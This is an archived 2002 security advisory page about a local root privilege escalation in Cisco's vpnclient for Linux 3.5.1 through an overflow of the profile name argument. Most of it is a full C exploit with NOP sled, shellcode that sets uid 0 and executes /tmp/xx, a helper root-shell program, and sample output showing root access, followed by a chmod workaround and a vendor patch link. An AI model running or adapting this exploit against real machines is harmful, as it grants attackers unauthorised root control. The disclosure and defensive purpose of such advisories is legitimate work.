TUCoPS :: Linux :: Apps A-M :: lnx5471.htm

Cisco vpnclient for Linux local root exploit
20th Jun 2002 [SBWID-5471]
COMMAND

	Cisco vpnclient for Linux local root exploit

SYSTEMS AFFECTED

	vpnclient-linux-3.5.1.Rel-k9 and perhaps earlier versions

PROBLEM

	In methodic of  AngryPacket  Security  [http://methodic.angrypacket.com]
	advisory, with the help of dmuz and  vegac,  and  also  shok  of  w00w00
	[http://sec.angrypacket.com] [0x0002] :
	

	Any local user can gain root privileges via a  buffer  overflow  in  the
	\'connect\' argument when a long profile name  (520  bytes  to  own  the
	eip) is specified and the executable is suid root.
	

	Cisco\'s  install  script  installs  vpnclient  suid  root  by  default,
	although it does advise administrators  about  the  permissions  set  on
	vpnclient, and that they may wish to change them.
	

	

	 Exploit

	 =======

	

	/* buffer overflow for cisco\'s vpnclient for linux

	   tested against the latest release: vpnclient-linux-3.5.1.Rel-k9.tar.gz

	

	   to get this to properly work, you need to put the following code into

	   xx.c, compile it (as xx), and place the executable into /tmp (to bypass

	   tight PAM restrictions)

	

	   #include <stdio.h>

	   main() {

	     setuid(0);

	     execl(\"/bin/sh\", \"sh\", NULL);

	   }

	

	   then compile this and run it. syntax is ./vpnclient <offset>

	   tested under gentoo linux and debian:

	   $ ls -la `which vpnclient`

	   -rws--x--x    1 root   root   160900 Apr 13 22:34 /usr/local/bin/vpnclient

	   $ ./vpnKILLient 

	   addr: 0xbffffbac, offset: 0

	   Cisco Systems VPN Client Version 3.5.1 (Rel)

	   Copyright (C) 1998-2002 Cisco Systems, Inc. All Rights Reserved.

	   Client Type(s): Linux

	   Running on: Linux 2.4.17 #1 Sat Apr 13 21:53:52 EDT 2002 i686

	

	   sh-2.05a# id

	   uid=0(root) gid=100(users) groups=100(users),10(wheel)

	

	   greetz: all of the angrypacket crew (of course)

	           shok  -> pheerable^2;

	           vegac -> 31336++;

	

	   when you get a chance, check out http://sec.angrypacket.com

	*/

	

	#include <stdio.h>

	#include <string.h>

	#include <unistd.h>

	

	#define NOP 0x90

	#define LEN 620 /* 520 to own eip */

	

	/* shellcode by vegac (setuid(0)->/tmp/xx) */

	/* wont work if your /tmp partition is mounted noexec or nosuid */

	char shell[]=

	        \"\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80\"

	        \"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x78\\x78\"

	        \"\\x68\\x2f\\x74\\x6d\\x70\\x89\\xe3\\x31\"

	        \"\\xc0\\x50\\x89\\xe2\\x54\\x89\\xe1\\xb0\"

	        \"\\x0b\\xcd\\x80\\x00\";

	

	unsigned long get_sp (void) {

		__asm__(\"mov %esp,%eax\");

	}

	int main(int argc, char *argv[]) {

	

		int i, offset=0;

		long addr;

		char *buf, *ptr;

	

		if(argc > 1) offset = atoi(argv[1]);

	

		buf = (char *)malloc(sizeof(char) * LEN);

		bzero(buf, LEN);

		addr = get_sp() - offset;

		printf(\"addr: 0x%x, offset: %d\\n\", addr, offset);

	

		for(i = 0; i < LEN; i += 4) {

			*(long *)&buf[i] = addr;

		}

	

		for(i = 0; i < (LEN / 2); i++) {

			*(buf + i) = NOP;

		}

	

		ptr = buf + ((LEN / 2) - (strlen(shell) / 2));

		for(i = 0; i < strlen(shell); i++) {

			*(ptr++) = shell[i];

		}

		buf[LEN - 1] = \'\\0\';

	

		execl(\"/usr/local/bin/vpnclient\", \"vpnclient\", \"connect\", buf, 0);

		return(0);

	

	}

	

SOLUTION

	 Workaround

	 ==========

	

	chmod -s vpnclient
	

	 Patch

	 =====

	

	See :
	

	http://www.cisco.com/warp/public/707/cisco-unix-vpnclient-buffer-overflow-pub.shtml

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH